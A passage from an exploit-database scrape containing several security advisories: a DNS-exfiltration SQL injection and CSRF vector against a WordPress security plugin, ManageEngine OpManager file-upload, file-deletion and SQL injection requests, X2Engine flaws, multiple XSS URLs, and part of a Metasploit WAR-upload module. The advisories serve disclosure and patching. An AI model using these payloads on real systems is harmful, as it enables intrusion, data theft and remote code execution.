The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:\n\n<img src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\">\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nUpdate to All In One WP Security 3.8.3\n\nMore Information:\nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.\n[2] All In One WP Security WordPress plugin - 
http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-14T14:37:35", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "zdt", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2018-01-26T00:00:00", "id": "1337DAY-ID-29642", "href": "https://0day.today/exploit/description/29642", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n \r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n \r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n \r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. 
With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n \r\n \r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n \r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n \r\nAffected versions: OpManager v? to v11.4\r\n \r\n \r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n \r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n \r\n \r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... 
WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\n \r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\n \r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. 
No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n \r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n \r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n \r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/29642", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-09T13:20:31", "description": "X2Engine versions 2.8 through 4.1.7 suffer from a PHP object injection and below suffer from an unrestricted file upload vulnerability due to poor use of a blacklist.", "cvss3": {}, "published": "2014-09-23T00:00:00", "type": "zdt", "title": "X2Engine 4.1.7 PHP Object Injection / Unrestricted File Upload Vulnerabilies", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-5297", "CVE-2014-5298"], "modified": "2014-09-23T00:00:00", "id": "1337DAY-ID-22679", "href": "https://0day.today/exploit/description/22679", "sourceData": "-------------------------------------------------------------------------\r\nX2Engine <= 4.1.7 (SiteController.php) PHP Object Injection Vulnerability\r\n-------------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.x2engine.com/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nAll versions from 2.8 to 4.1.7.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in the \"actionSendErrorReport\" method defined in /protected/controllers/SiteController.php:\r\n\r\n153. 
public function actionSendErrorReport(){\r\n154. if(isset($_POST['report'])){\r\n155. $errorReport = $_POST['report'];\r\n156. $errorReport = unserialize(base64_decode($errorReport));\r\n157. if(isset($_POST['email'])){\r\n158. $errorReport['email'] = $_POST['email'];\r\n159. }\r\n\r\nUser input passed through the \"report\" POST parameter is not properly sanitized before being used in a call to the \"unserialize()\"\r\nfunction at line 156. This can be exploited to inject arbitrary PHP objects into the application scope, and could allow an\r\nattacker to carry out Server-Side Request Forgery (SSRF) and possibly other attacks via specially crafted serialized objects.\r\n\r\n\r\n[-] Solution:\r\n\r\nApply the vendor patch or update to version 4.2 or later.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[31/07/2014] - Vendor notified\r\n[31/07/2014] - Vendor released security patch: http://x2community.com/?showtopic=1804\r\n[01/08/2014] - CVE number requested\r\n[16/08/2014] - CVE number assigned\r\n[05/09/2014] - Version 4.2 released\r\n[23/09/2014] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2014-5297 to this vulnerability.\r\n\r\n\r\n\r\n--------------------------------------------------------------------------------\r\nX2Engine <= 4.1.7 (FileUploadsFilter.php) Unrestricted File Upload Vulnerability\r\n--------------------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.x2engine.com/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 4.1.7 and probably prior versions.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerability exists because of the FileUploadsFilter::EXT_BLACKLIST constant, which is a regular\r\nexpression for blacklisted files. 
Due to a lack of case-insensitive matching, the global upload filter\r\ncould be bypassed by uploading a malicious file with capital letters within the extension. This can be\r\nexploited to upload and execute arbitrary PHP scripts if X2Engine is running on a case-insensitive\r\nfilesystem or if the web server is configured to handle files\u2019 extensions in a case-insensitive fashion.\r\n\r\n\r\n[-] Solution:\r\n\r\nUpdate to version 4.2 or later.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[01/08/2014] - Vendor notified\r\n[02/08/2014] - CVE number requested\r\n[16/08/2014] - CVE number assigned\r\n[05/09/2014] - Version 4.2 released\r\n[23/09/2014] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2014-5298 to this vulnerability.\r\n\r\n[-] Credits:\r\n\r\nVulnerability discovered by Egidio Romano.\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/22679", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:47", "description": "WordPress Google Calendar Events plugin version 2.0.1 suffers from a cross site scripting vulnerability.", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "zdt", "title": "WordPress Google Calendar Events 2.0.1 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7138"], "modified": "2014-10-10T00:00:00", "id": "1337DAY-ID-22744", "href": "https://0day.today/exploit/description/22744", "sourceData": "Product: Google Calendar Events WordPress plugin\r\nVendor: Phil Derksen\r\nVulnerable Version(s): 2.0.1 and probably prior\r\nTested Version: 2.0.1\r\nAdvisory Publication: September 17, 2014 [without technical details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: October 7, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting 
[CWE-79]\r\nCVE Reference: CVE-2014-7138\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Google Calendar Events WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin: CVE-2014-7138\r\n\r\nInput passed via the \"gce_feed_ids\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://wordpress/wp-admin/admin-ajax.php?action=gce_ajax&gce_type=page&gce_feed_ids=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Google Calendar Events 2.0.4\r\n\r\nMore Information:\r\nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/df1fe1d71f8ce9496cc601c96839c474e49db91d\r\nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/a701ceeb410bdda9d96c9d3d12104630df5d5b43\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/22744", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-03-09T21:13:34", "description": "WordPress 
Contact Form DB plugin version 2.8.13 suffers from a cross site scripting vulnerability.", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "zdt", "title": "WordPress Contact Form DB 2.8.13 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7139"], "modified": "2014-10-10T00:00:00", "id": "1337DAY-ID-22743", "href": "https://0day.today/exploit/description/22743", "sourceData": "Product: Contact Form DB WordPress plugin\r\nVendor: Michael Simpson\r\nVulnerable Version(s): 2.8.13 and probably prior\r\nTested Version: 2.8.13\r\nAdvisory Publication: September 17, 2014 [without technical details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: September 25, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-7139\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Contact Form DB WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin installed.\r\n\r\n1) Two Cross-Site Scripting (XSS) Vulnerabilities in Contact Form DB WordPress Plugin: CVE-2014-7139\r\n\r\n1.1 Input passed via the \"form\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. 
A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.2 Input passed via the \"enc\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&enc=%27%22%29;%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Contact Form DB 2.8.16.\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/contact-form-7-to-database-extension/changelog/\n\n# 0day.today [2018-03-09] #", "sourceHref": "https://0day.today/exploit/22743", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-01T01:06:51", "description": "WordPress Photo Gallery plugin version 1.1.30 suffers from a cross site scripting vulnerability.", "cvss3": {}, "published": "2014-10-02T00:00:00", "type": "zdt", "title": "WordPress Photo Gallery 1.1.30 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6315"], "modified": "2014-10-02T00:00:00", "id": "1337DAY-ID-22718", "href": "https://0day.today/exploit/description/22718", "sourceData": "Product: Photo Gallery WordPress plugin\r\nVendor: 
http://web-dorado.com/\r\nVulnerable Version(s): 1.1.30 and probably prior\r\nTested Version: 1.1.30\r\nAdvisory Publication: September 10, 2014 [without technical details]\r\nVendor Notification: September 10, 2014 \r\nVendor Patch: September 10, 2014 \r\nPublic Disclosure: October 1, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-6315\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315\r\n\r\n1.1 Input passed via the \"callback\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.2 Input passed via the \"dir\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. 
A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.3 Input passed via the \"extensions\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Photo Gallery 1.1.31\n\n# 0day.today [2017-12-31] #", "sourceHref": "https://0day.today/exploit/22718", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-03-19T07:13:00", "description": "MyWebSQL version 3.4 suffers from a cross site scripting vulnerability.", "cvss3": {}, "published": "2014-09-04T00:00:00", "type": "zdt", "title": "MyWebSQL 3.4 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-4735"], "modified": "2014-09-04T00:00:00", "id": "1337DAY-ID-22590", "href": "https://0day.today/exploit/description/22590", "sourceData": "Product: MyWebSQL\r\nVendor: http://mywebsql.net/\r\nVulnerable Version(s): 3.4 and probably 
prior\r\nTested Version: 3.4\r\nAdvisory Publication: June 25, 2014 [without technical details]\r\nVendor Notification: June 25, 2014 \r\nPublic Disclosure: September 3, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-4735\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in MyWebSQL, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in MyWebSQL: CVE-2014-4735\r\n\r\nThe vulnerability is caused by insufficient sanitization of the \"table\" HTTP GET parameter passed to \"/index.php\" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of vulnerable website. 
Further exploitation of this vulnerability may grant an attacker full access to the website's databases and get complete control over it.\r\n\r\nThe following exploitation example uses the alert() JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/?q=wrkfrm&type=exporttbl&table=%27;%3C/script%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nDisclosure timeline:\r\n2014-06-25 Vendor alerted via emails and contact form.\r\n2014-07-03 Vendor alerted via emails, contact form and twitter.\r\n2014-07-03 Vendor replied that he received information.\r\n2014-07-10 Fix requested.\r\n2014-07-10 Vendor requested to move public disclosure date to August 30.\r\n2014-08-27 Fix requested.\r\n2014-08-27 Vendor didn't release any patch and agreed to disclose on August 30 without patch.\r\n2014-08-27 Disclosure date moved to September 3.\r\n2014-09-01 Fix requested.\r\n2014-09-03 Public disclosure, patch by HTB Research is available.\r\n\r\nCurrently we are not aware of any official solution for this vulnerability.\r\nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23221-patch.zip\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/22590", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-02T19:34:58", "description": "Exploit for java platform in category remote exploits", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "zdt", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6034"], "modified": "2014-10-01T00:00:00", "id": "1337DAY-ID-22712", "href": "https://0day.today/exploit/description/22712", "sourceData": ">> Multiple vulnerabilities in ManageEngine 
OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; IT360 v? 
to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\nAffected versions: OpManager v? to v11.3\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 v? to v10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\nRank = ExcellentRanking\r\n\r\ninclude Msf::Exploit::Remote::HttpClient\r\ninclude Msf::Exploit::FileDropper\r\n\r\ndef initialize(info = {})\r\nsuper(update_info(info,\r\n'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',\r\n'Description' => %q{\r\nThis module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.\r\nThe vulnerability exists in the FileCollector servlet which accepts unauthenticated\r\nfile uploads. 
This module has been tested successfully on OpManager v8.8 - v11.3 and on\r\nversion 11.0 of SocialIT for Windows and Linux.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n[ 'CVE', '2014-6034' ],\r\n[ 'OSVDB', '112276' ],\r\n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt'\r\n],\r\n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]\r\n],\r\n'Privileged' => true,\r\n'Platform' => 'java',\r\n'Arch' => ARCH_JAVA,\r\n'Targets' =>\r\n[\r\n[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]\r\n],\r\n'DefaultTarget' => 0,\r\n'DisclosureDate' => 'Sep 27 2014'))\r\n\r\nregister_options(\r\n[\r\nOpt::RPORT(80),\r\nOptInt.new('SLEEP',\r\n[true, 'Seconds to sleep while we wait for WAR deployment', 15]),\r\n], self.class)\r\nend\r\n\r\ndef check\r\nres = send_request_cgi({\r\n'uri' =>\r\nnormalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"),\r\n'method' => 'GET'\r\n})\r\n\r\n# A GET request on this servlet returns \"405 Method not allowed\"\r\nif res and res.code == 405\r\nreturn Exploit::CheckCode::Detected\r\nend\r\n\r\nreturn Exploit::CheckCode::Safe\r\nend\r\n\r\n\r\ndef upload_war_and_exec(try_again, app_base)\r\ntomcat_path = '../../../tomcat/'\r\nservlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'\r\n\r\nif try_again\r\n# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration\r\n# does not allow us to deploy WARs. 
